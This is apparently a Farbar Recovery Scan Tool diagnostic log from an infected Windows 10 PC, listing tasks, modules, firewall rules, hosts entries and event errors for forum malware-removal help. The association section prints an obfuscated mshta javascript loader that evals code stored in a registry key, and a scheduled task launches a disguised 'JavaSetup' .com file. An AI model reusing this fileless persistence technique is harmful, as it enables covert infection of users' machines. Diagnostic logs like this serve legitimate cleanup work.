Task: {FC0893D8-4C4B-4F8B-82B2-D1FD283452A7} - System32\Tasks\{6500079D-710C-4201-A20E-1724F3D7A343} => pcalua.exe -a "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5ZAZU6CA\JavaSetup8u31.com" -d C:\Users\admin\Desktop
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-4142771536-1505296934-324239511-1000.job => C:\Users\admin\AppData\Local\Citrix\GoToMeeting\5636\g2mupdate.exe
Task: C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-4142771536-1505296934-324239511-1000.job => C:\Users\admin\AppData\Local\Citrix\GoToMeeting\5636\g2mupload.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d041dfa521745e.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d08f0476acbae7.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\TrackerAutoUpdate.job => C:\Program Files\Tracker Software\Update\TrackerUpdate.exe
Task: C:\WINDOWS\Tasks\update-S-1-5-21-4142771536-1505296934-324239511-1000.job => C:\Program Files\Skillbrains\Updater\Updater.exe
Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files\Skillbrains\Updater\Updater.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\admin\Favorites\NCH Software Download Site.lnk -> hxxp://www.nchsoftware.com/index.html
Shortcut: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ScenicReflections\Ultimate Christmas Scenic Reflections\Visit ScenicReflections.com.lnk -> hxxp://www.scenicreflections.com/
 
==================== Loaded Modules (Whitelisted) ==============
 
2016-07-16 11:25 - 2016-07-16 11:25 - 00190976 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02048496 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2011-03-14 18:27 - 2011-03-14 18:27 - 00271712 _____ () C:\ProgramData\DatacardService\HWDeviceService.exe
2014-01-28 13:02 - 2014-01-28 13:02 - 00007168 _____ () C:\Program Files\Aquila Technology\WOLAgent\WOLAgent.exe
2014-11-14 13:05 - 2014-11-14 13:03 - 00239968 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\ouc.exe
2014-11-14 13:05 - 2014-11-14 13:03 - 00011362 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\mingwm10.dll
2014-11-14 13:05 - 2014-11-14 13:03 - 00043008 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\libgcc_s_dw2-1.dll
2014-11-14 13:05 - 2014-11-14 13:03 - 02415104 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\QtCore4.dll
2014-11-14 13:05 - 2014-11-14 13:03 - 01148416 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\QtNetwork4.dll
2014-11-14 13:05 - 2014-11-14 13:03 - 00383488 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\QueryStrategy.dll
2014-11-14 13:05 - 2014-11-14 13:03 - 00398336 _____ () C:\ProgramData\Digi Net Mobile\OnlineUpdate\QtXml4.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 00655712 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\ouc.exe
2014-12-15 16:49 - 2014-12-15 16:46 - 00011362 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\mingwm10.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 00043008 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\libgcc_s_dw2-1.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 02415104 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\QtCore4.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 01148416 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\QtNetwork4.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 00835072 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\QueryStrategy.dll
2014-12-15 16:49 - 2014-12-15 16:46 - 00398336 _____ () C:\ProgramData\Mobile Partner\OnlineUpdate\QtXml4.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 02048496 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-08-26 09:28 - 2016-08-26 09:28 - 01383616 _____ () C:\Users\admin\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\ClientTelemetry.dll
2016-03-14 15:03 - 2016-03-14 15:03 - 04319232 _____ () C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll
2016-07-16 11:25 - 2016-07-16 11:25 - 00108032 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00321536 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-10-13 09:26 - 2016-10-05 12:10 - 06726656 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-10-13 09:26 - 2016-10-05 12:06 - 01149440 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00526848 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-10-13 09:26 - 2016-10-05 12:05 - 00779776 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-10-13 09:26 - 2016-10-05 12:05 - 01725440 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-10-13 09:26 - 2016-10-05 12:07 - 03158528 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2012-11-27 00:54 - 2012-11-27 00:54 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll
2016-04-25 09:53 - 2014-11-18 14:44 - 00255072 _____ () C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\TrayTipAgentE.exe
2016-04-25 09:53 - 2014-02-13 15:27 - 00222792 _____ () C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\traynet.dll
2016-04-25 09:53 - 2014-02-13 15:27 - 00275528 _____ () C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\libcurl.dll
2016-04-25 09:53 - 2014-02-13 15:27 - 00113166 _____ () C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\zlib1.dll
2016-04-25 09:53 - 2014-02-13 15:27 - 00249928 _____ () C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\uexper.dll
2016-07-07 12:20 - 2015-05-21 16:15 - 00883872 _____ () C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\platforms\qwindows.dll
2016-08-26 09:28 - 2016-08-26 09:28 - 00118976 _____ () C:\Users\admin\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\FileSyncViews.dll
2016-10-13 11:43 - 2016-10-13 11:43 - 00098816 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32api.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00110080 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\pywintypes27.dll
2016-10-13 11:43 - 2016-10-13 11:43 - 00364544 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\pythoncom27.dll
2016-10-13 11:43 - 2016-10-13 11:43 - 00320512 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32com.shell.shell.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00776704 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_hashlib.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 01176576 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._core_.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00806400 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._gdi_.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00816128 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._windows_.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 01067008 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._controls_.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00733184 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._misc_.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00682496 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\pysqlite2._sqlite.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00088064 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_ctypes.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00119808 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32file.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00108544 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32security.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00007168 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\hashobjs_ext.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00017920 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\thumbnails_ext.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00088064 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\usb_ext.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00012800 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\common.time34.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00018432 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32event.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00167936 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32gui.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00046080 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_socket.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 01208320 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_ssl.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00128512 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_elementtree.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00127488 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\pyexpat.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00038912 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32inet.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00036864 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_psutil_windows.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00525208 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\windows._lib_cacheinvalidation.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00011264 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32crypt.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00077312 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._html2.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00027136 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_multiprocessing.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00020480 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\_yappi.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00035840 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32process.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00686080 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\unicodedata.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00078848 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._animate.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00123392 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\wx._wizard.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00024064 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32pipe.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00010240 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\select.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00025600 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32pdh.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00017408 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32profile.pyd
2016-10-13 11:43 - 2016-10-13 11:43 - 00022528 ____R () C:\Users\admin\AppData\Local\Temp\_MEI72322\win32ts.pyd
2016-10-04 10:08 - 2016-09-25 06:47 - 01805416 _____ () C:\Program Files\Google\Chrome\Application\53.0.2785.143\libglesv2.dll
2016-10-04 10:08 - 2016-09-25 06:47 - 00093288 _____ () C:\Program Files\Google\Chrome\Application\53.0.2785.143\libegl.dll
2016-10-04 09:59 - 2016-10-04 10:01 - 00062464 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x86__kzf8qxf38zg5c\SkypeHost.exe
2016-10-04 09:59 - 2016-10-04 10:01 - 00151040 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x86__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-10-04 09:59 - 2016-10-04 10:01 - 27109376 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x86__kzf8qxf38zg5c\SkyWrap.dll
2016-10-12 08:59 - 2016-09-30 10:51 - 17769664 _____ () C:\Users\admin\AppData\Local\Google\Chrome\User Data\PepperFlash\23.0.0.185\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\Software\Classes\exefile:  <===== ATTENTION
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\Software\Classes\.exe:  =>  <===== ATTENTION
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\Software\Classes\07cXlht: mshta "javascript:QwtO8Ko1ub="8rD5R7BWXr";VC63=new ActiveXObject("WScript.Shell");sT83WVpF="jOE5Rw";QoK54P=VC63.RegRead("HKCU\\software\\488ad9a48f\\40a6d130");H4lqkarHs="Ld8BX";eval(QoK54P);O1nHxcaAw="WH";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 05:04 - 2016-09-01 11:23 - 00000228 ___RA C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1       localhost
127.0.0.1                   thislineskipsanyemptylines
127.0.0.1                   bandicam.com
127.0.0.1                   ssl.bandisoft.com
127.0.0.1                   thislineskipsanyemptylines
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 192.168.200.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-32bit] => (Allow) LPort=808
FirewallRules: [{4CD4689A-5727-4C28-8971-B5BA0999FB48}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{2CC70588-79B5-4C12-8823-AE5C776BF024}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{C32956EE-9A89-4658-A66D-0B064FF93D80}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{08B653DD-9FD4-43B2-9ED7-28C82E54FD96}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{D4EC22CB-47A9-4B89-B709-B9E0367D32A3}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{3634081A-5DFD-46B1-8905-8C1B1853E2DE}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{92233F84-7DCB-4F19-B6D8-F7E62AF6579C}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{FEF6E7E9-49C3-4271-8FAC-7EC8BC829891}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{29BD67E1-5DF4-443D-B784-8C877DAFD581}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{17AA55AE-2893-4063-A120-8BA4660B1E41}] => (Allow) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{2A76D585-1BDC-4345-B9F2-91E608E3D0C7}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{943F8507-613E-4249-AD19-7B660D23C2CF}] => (Allow) C:\WINDOWS\explorer.exe
FirewallRules: [{B300D810-8F35-411D-80BC-0E12271BA750}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{51D06297-3DA0-4D62-9C7A-A10D668200C2}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{DA5F1496-B05A-4B1C-A2DD-FCC9B63E82DC}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{250EB19C-D0EB-4834-B8F9-FF9E05D5526D}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{05EE5532-EFC3-4C63-8156-465DAE2F1A08}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
FirewallRules: [{32CE4F39-41F6-458A-B286-DE4A5CB298EB}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeCam.exe
FirewallRules: [{62E5B45D-6A39-41F5-8E10-1532C09E4979}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeCam.exe
FirewallRules: [{FAC6C8BB-CC7A-4D92-B7DE-27BA98EA515C}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeEnC2.exe
FirewallRules: [{C1C154E7-DE6A-4D86-B72B-BCABCB02138D}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeEnC2.exe
FirewallRules: [{ADD07562-5827-4E93-B16A-DA95BB869A31}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeExp.exe
FirewallRules: [{8CB9F83F-70FA-40FA-8B9D-C0DCC865D9A4}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeExp.exe
FirewallRules: [{3FC4FEA1-9461-45CD-9DA9-87E2818A6489}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeTray.exe
FirewallRules: [{46F468C7-30ED-4A0E-83FB-0BC29A4CC752}] => (Allow) C:\Program Files\Microsoft LifeCam\LifeTray.exe
FirewallRules: [TCP Query User{5465B48D-4E8B-49FF-9D76-623F5167DD96}C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe] => (Allow) C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [UDP Query User{CEE92593-DBB1-4E77-B91D-E8210E6D2FE4}C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe] => (Allow) C:\wamp\bin\apache\apache2.4.9\bin\httpd.exe
FirewallRules: [{01D5B1EA-7EF7-43EE-B108-F8880AB92735}] => (Allow) C:\Users\admin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{D7A37CA2-04F2-4B0F-8973-88FABAC040AB}] => (Allow) C:\Users\admin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{9DD9826C-8C7F-4793-8D43-CBB47EE619A6}] => (Allow) C:\Program Files\Skype\Phone\Skype.exe
FirewallRules: [{64520A03-ED28-4520-BE80-98E654049A63}] => (Allow) C:\Windows\system32\LMabcoms.exe
FirewallRules: [{D1F5DBD0-0BB9-4D45-B0B3-BB80990D7CC6}] => (Allow) C:\Program Files\MetaTrader-Admiral Markets\metatester.exe
FirewallRules: [TCP Query User{B7AC8F7A-A6CD-4698-9AE5-FC7095D5B889}C:\program files\netbeans 8.0.1\bin\netbeans.exe] => (Allow) C:\program files\netbeans 8.0.1\bin\netbeans.exe
FirewallRules: [UDP Query User{11ECD810-2567-45C4-8A49-04CCDF98CB17}C:\program files\netbeans 8.0.1\bin\netbeans.exe] => (Allow) C:\program files\netbeans 8.0.1\bin\netbeans.exe
FirewallRules: [{F6DE8EC5-B797-4F2C-9908-86ADA4DCB99B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{A3794D0F-7C33-4D77-881B-F4F21D605CE1}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{901D61D8-0F8B-4DA7-B67B-EF80DF08C812}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{A4AC5E55-1A62-4EE2-8517-E7B16804D642}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe
FirewallRules: [{F7E88328-3528-46ED-85FA-A3EF53727A3E}] => (Allow) C:\Program Files\Siber Systems\GoodSync\GoodSync.exe
FirewallRules: [{EF3C97DB-D160-4B9E-A9DA-3ECEA9F3C1F2}] => (Allow) C:\Program Files\Siber Systems\GoodSync\GoodSync.exe
FirewallRules: [{BADE5B48-25EC-4E05-B935-BE63209F288A}] => (Allow) C:\Program Files\Siber Systems\GoodSync\GsExplorer.exe
FirewallRules: [{B384E91E-6D80-436B-8627-1C3A5291A3D9}] => (Allow) C:\Program Files\Siber Systems\GoodSync\GsExplorer.exe
FirewallRules: [{53843B90-F874-4611-B402-9D3C0ED75982}] => (Allow) C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe
FirewallRules: [{1EB4E975-7723-4670-A23A-A1F2A997AFBE}] => (Allow) C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe
FirewallRules: [{593096DC-F9F0-4294-BD68-20DAD410045C}] => (Allow) LPort=33333
FirewallRules: [{92347BF4-0F43-4FFD-9C91-881B5C3D43C3}] => (Allow) LPort=33338
FirewallRules: [{F2D4ABF2-0226-4FBB-BF02-B1709840E303}] => (Allow) C:\Users\admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [{E459F547-6E94-4176-8A15-237E76884A0E}] => (Allow) LPort=8888
FirewallRules: [{21996C04-4EE9-4EE6-9AE4-479E6EB2C27B}] => (Allow) LPort=8888
FirewallRules: [{10E05A0B-28D3-420D-9278-6CFCEFEB5038}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
13-10-2016 10:38:15 Windows Update
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/13/2016 11:36:20 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Getstarted_4.0.12.0_x86__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (10/13/2016 11:16:40 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Getstarted_4.0.12.0_x86__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (10/13/2016 10:38:37 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
Error: (10/12/2016 11:41:41 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "BITS" in DLL "C:\Windows\System32\bitsperf.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
 
Error: (10/11/2016 03:29:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (10/11/2016 03:29:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (10/11/2016 03:29:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (10/11/2016 03:29:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (10/11/2016 09:32:14 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerTrMate-5744)
Description: Activation of app Microsoft.ZuneVideo_8wekyb3d8bbwe!Microsoft.ZuneVideo failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (10/11/2016 09:32:10 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Video.UI.exe, version: 3.6.2506.0, time stamp: 0x57e95173
Faulting module name: Windows.UI.Xaml.dll, version: 10.0.14393.187, time stamp: 0x57cf9c3e
Exception code: 0xc000027b
Fault offset: 0x008b7a98
Faulting process id: 0x1d80
Faulting application start time: 0x01d223892e7398aa
Faulting application path: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_3.6.25061.0_x86__8wekyb3d8bbwe\Video.UI.exe
Faulting module path: C:\Windows\System32\Windows.UI.Xaml.dll
Report Id: a6e2bc30-27e3-4d56-af81-dcfe5eeca02d
Faulting package full name: Microsoft.ZuneVideo_3.6.25061.0_x86__8wekyb3d8bbwe
Faulting package-relative application ID: Microsoft.ZuneVideo
 
 
System errors:
=============
Error: (10/13/2016 11:42:45 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 and APPID 
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (10/13/2016 11:42:26 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Mobile Partner. RunOuc service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (10/13/2016 11:42:26 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Mobile Partner. RunOuc service to connect.
 
Error: (10/13/2016 11:42:23 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Digi Net Mobile. RunOuc service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (10/13/2016 11:42:23 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Digi Net Mobile. RunOuc service to connect.
 
Error: (10/13/2016 11:42:22 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NetTcpActivator service depends on the NetTcpPortSharing service which failed to start because of the following error: 
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
